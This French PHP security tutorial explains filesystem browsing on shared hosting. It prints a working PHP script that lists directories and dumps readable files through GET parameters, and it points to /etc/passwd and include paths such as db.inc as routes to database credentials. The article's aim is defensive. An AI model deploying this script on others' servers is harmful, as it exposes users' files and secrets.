Maison  >  Article  >  développement back-end  >  Sécurité PHP - Navigation dans le système de fichiers

Sécurité PHP - Navigation dans le système de fichiers

黄舟
黄舟original
2017-02-20 09:30:08897parcourir



Navigation dans le système de fichiers

En plus de pouvoir lire des fichiers arbitraires sur le serveur partagé, l'attaquant peut également créer un script capable de parcourir le système de fichiers. Étant donné que la plupart de vos fichiers sensibles ne seront pas stockés dans le répertoire personnel de votre site Web, ce type de script est généralement utilisé pour trouver l'emplacement de vos fichiers sources. Veuillez consulter l'exemple suivant :

 <pre class="brush:php;toolbar:false">
 
  <?php
 
  if (isset($_GET[&#39;dir&#39;]))
  {
    ls($_GET[&#39;dir&#39;]);
  }
  elseif (isset($_GET[&#39;file&#39;]))
  {
    cat($_GET[&#39;file&#39;]);
  }
  else
  {
    ls(&#39;/&#39;);
  }
 
  function cat($file)
  {
    echo htmlentities(file_get_contents($file),
ENT_QUOTES, &#39;UTF-8&#39;));
  }
 
  function ls($dir)
  {
    $handle = dir($dir);
 
    while ($filename = $handle->read())
    {
      $size = filesize("$dir$filename");
 
      if (is_dir("$dir$filename"))
      {
        $type = &#39;dir&#39;;
        $filename .= &#39;/&#39;;
      }
      else
      {
        $type = &#39;file&#39;;
      }
 
      if (is_readable("$dir$filename"))
      {
        $line = str_pad($size, 15);
        $line .= "<a
href=\"{$_SERVER[&#39;PHP_SELF&#39;]}";
        $line .=
"?$type=$dir$filename\">$filename</a>";
      }
      else
      {
        $line = str_pad($size, 15);
        $line .= $filename;
      }
 
      echo "$line\n";
    }
 
    $handle->close();
  }
 
  ?>
 
  


Un attaquant peut d'abord consulter le fichier /etc/passwd ou le répertoire /home pour obtenir une liste de noms d'utilisateur sur le serveur ; l'emplacement des fichiers sources stockés en dehors du répertoire personnel du site Web peut être découvert grâce à des structures de langage telles que include ou require. Par exemple, considérons le fichier de script suivant /home/victim/public_html/admin.php :

  <?php
 
  include &#39;../inc/db.inc&#39;;
 
  /* ... */
 
  ?>


Si un attaquant parvient à afficher le code source du fichier, il peut découvrir l'emplacement de db.inc et utiliser la fonction readfile() pour exposer son contenu et accéder à la base de données. Ainsi, enregistrer db.inc en dehors du répertoire personnel du site Web ne le protège pas dans cet environnement.

Cette attaque illustre pourquoi tous les fichiers sources d'un serveur partagé doivent être considérés comme publics et la base de données choisie pour stocker toutes les données sensibles.

Ce qui précède est le contenu de la navigation dans le système de fichiers de sécurité PHP. Pour plus de contenu connexe, veuillez prêter attention au site Web PHP chinois (www. php.cn) !


Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn